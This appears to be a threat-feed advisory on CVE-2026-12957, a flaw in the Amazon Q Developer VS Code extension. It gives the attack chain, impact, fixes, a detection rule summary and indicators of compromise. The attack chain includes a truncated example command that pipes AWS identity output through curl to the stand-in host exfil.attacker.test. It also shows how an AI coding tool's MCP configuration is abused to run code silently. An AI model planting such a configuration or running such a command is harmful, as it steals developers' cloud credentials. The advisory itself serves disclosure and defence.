Skip to content
Threat Feed
high advisory PoC updated

CVE-2026-12957: Amazon Q VS Code Extension Arbitrary Code Execution

A high-severity vulnerability (CVE-2026-12957) in the Amazon Q Developer Extension for Visual Studio Code allowed attackers to achieve arbitrary code execution and cloud credential theft by automatically loading and executing malicious Model Context Protocol (MCP) server configurations from a `.amazonq/mcp.json` file in a repository without user consent, providing full access to a developer's environment and cloud credentials.

What's new

  • l2 added CVE-2024-21626; windsurf version V1.9566; amazon q developer version language server version < 1.69.0; cursor version < 3.0; OS macos; OS linux Jul 8, 14:08 via wiz
  • l1 new product Jun 29, 18:46 via dark-reading
  • l1 new product Jun 26, 15:27 via securityweek
  • l2 poc_available; added CVE-2025-54136 +3 Jun 26, 14:25 via the-hacker-news

Wiz Research discovered a high-severity vulnerability, CVE-2026-12957, in the Amazon Q Developer Extension for Visual Studio Code, impacting language server versions prior to 1.65.0. This flaw allowed for arbitrary code execution and cloud credential theft. When a developer opened a malicious repository containing a specially crafted .amazonq/mcp.json file, Amazon Q would automatically load and execute Model Context Protocol (MCP) server configurations defined within this file. Critically, this execution occurred without user consent, workspace trust checks, or any visible indicators, and the spawned processes inherited the developer's full environment, including sensitive AWS credentials, API keys, and SSH agent sockets. This vulnerability, which demonstrates a broader pattern affecting AI coding tools, has since been remediated by Amazon in language server version 1.65.0, which now implements a consent prompt.

Attack Chain

  1. Attacker crafts a malicious repository containing a .amazonq/mcp.json file that defines an MCP server with a malicious command (e.g., bash -c "aws sts get-caller-identity | curl...").
  2. The attacker induces a developer to clone the malicious repository, potentially through social engineering, typosquatting, or malicious pull requests.
  3. The developer opens the cloned repository in VS Code, with the Amazon Q Developer Extension installed and active.
  4. Amazon Q automatically loads and executes the malicious MCP server configuration from the .amazonq/mcp.json file located in the workspace root without prompting the user for consent.
  5. The malicious command executes on the developer's machine, inheriting their complete environment, including sensitive AWS credentials (e.g., AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY).
  6. The output of the command, containing the developer's active AWS session information (e.g., from aws sts get-caller-identity), is exfiltrated to the attacker's controlled endpoint (e.g., exfil.attacker.test) via curl.
  7. The attacker uses the stolen AWS credentials to gain unauthorized access, establish persistence, or perform lateral movement within the developer's associated cloud environment.

Impact

The successful exploitation of CVE-2026-12957 results in immediate arbitrary code execution on the victim's machine with minimal user interaction, often occurring silently without visible indicators. This leads to the theft of cloud credentials (AWS, GCP, Azure), API keys, and other secrets, enabling attackers to establish cloud persistence by backdooring IAM users or infrastructure. The attacker can then perform supply chain attacks targeting maintainers of popular projects or conduct lateral movement into production systems if the developer has sufficient access. This vulnerability facilitates critical compromise of development environments and cloud resources, posing a significant risk to an organization's software supply chain and infrastructure.

Recommendation

  • Immediately upgrade the Amazon Q Developer Extension for Visual Studio Code to language server version 1.65.0 or later to patch CVE-2026-12957.
  • Educate developers to be cautious with untrusted repositories and review MCP consent prompts carefully when displayed by Amazon Q.
  • Deploy the Sigma rule provided in this brief to your SIEM to detect suspicious credential exfiltration attempts.
  • Monitor for the creation or modification of .amazonq/mcp.json files in development repositories, particularly in untrusted contexts.
  • Block the C2 domain exfil.attacker.test listed in the IOC table at the DNS resolver and network perimeter.

Detection coverage 1

Detect CVE-2026-12957 Exploitation - AWS Credential Exfiltration via Curl

high

Detects the specific command line observed in CVE-2026-12957 Proof of Concept for Amazon Q vulnerability, where AWS credentials are stolen and exfiltrated via curl.

sigma tactics: credential_access, exfiltration techniques: T1552, T1567.002 sources: process_creation, linux

Detection queries are available on the platform. Get full rules →

Indicators of compromise

1

domain

1

url

TypeValue
urlhttps://exfil.attacker.test/collect
domainexfil.attacker.test